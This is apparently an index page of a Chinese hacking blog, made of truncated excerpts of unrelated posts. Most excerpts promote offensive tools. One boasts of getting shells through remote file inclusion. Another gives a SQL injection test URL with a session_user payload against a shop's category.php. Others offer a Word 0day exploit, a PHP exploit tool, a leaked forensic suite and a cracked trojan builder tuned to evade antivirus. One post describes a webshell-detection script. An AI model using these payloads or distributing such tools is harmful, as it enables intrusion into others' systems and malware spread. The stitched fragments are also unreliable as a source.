...

这个工具很古老很古老了~~~~~ RFI（Remote File Inclusion）远程文件包含漏洞，一向都是本大王最喜欢的PHP漏洞，拿Shell最爽的一个洞，连上传都省了，直接远程包含以下就行。 X-Code...

先把3389.asp传进自己的空间。 然后打开主程序.exe...

...

http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC# goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filte r_attr=-999 Test it : http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC% 23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&fil ter_attr=-999%20OR%20length(session_user())=14%20or%201=2...

...

t00ls总是能看见不错的东西：http://www.t00ls.net/thread-6120-1-1.html 本大王在这里下载的：http://www.3est.com/thread-2287-1-1.html Word 0day漏洞，主要针对word2003(成功率几乎100%), 以及部分word xp+sp3、word 2000(成功率60%左右) Word 2003是重头， 其实该漏洞与系统补丁基本没关系。...

        白大王友情提示：非法入侵会免费享受躲猫猫游戏，提供免费啃窝窝头的机会。
谷歌工程师首发：windows最新0day 本地提谷歌果然卧虎藏龙，存在17年的漏洞编译至今通杀。

前段时间爆出来的漏洞，没愿意贴上来，因为很多地方都有转载，今天给个利用工具。 来源：http://www.t00ls.net/thread-5452-1-1.html <?php ini_set(“max_execution_time”,0); function post($v_hosts,$v_paths,$v_p) { $host = $v_hosts; $path = $v_paths; $pa =...

...

...

        原先据说是微软专门为国际刑警设计的，用来进行电子取证。
对于普通用户来说COFEE并没有太大用处而且也不适合使用，考虑诸多因素微软并没有公开发布COFEE，然而近日它却泄露到了网上，大小约为15MB。

        但是经过测试，15M的那个是无法使用的，仅仅只能查看说明文档，真正可以安装的cofee应该是一个30.6M的文件。
经过翻墙查找，找回来一个完整版的，原先的文件是放在国外网盘里面，需要翻墙才能下载。现在本大王传到国内空间里面，提供下载。

免责声明:本程序仅供技术研究，不对不当使用本软件所产生的任何不良后果负任何责任。 如果你不知道此工具如何使用，请勿询问，因为你根本用不到此软件。 呃，其实我想明天发出来的，因为今天发过一篇了[手把手教你安装windows server 2008R2标准版（图解）]...

...

...

【白银时代】备注：快国庆了，网监部门都看的比较严，大家低调一点。下载之前请看好本站的置顶声明[关于本站的一些说明（内容、友链、免责声明） ]...

...

【白银时代】备注：作者：Neeao，来源于http://neeao.com/archives/5/ Web安全应急响应中，不免要检查下服务器上是否被上传了webshell，手工检查比较慢，就写了个脚本来检查了。Windows平台下已经有了lake2写的雷克图的了，一般的检查也够用了，写了个Linux下面的，用python写的。 1.使用方法：find.py 目录名称 2....

【白银时代】备注：彻头彻尾的NB改版来的，好在DAT文件外置，方面免杀…… 由于是破解版的 登陆ID 密码 随便打就可以了 生成木马不要用源程序带的生成功能。因为用不了 –...

...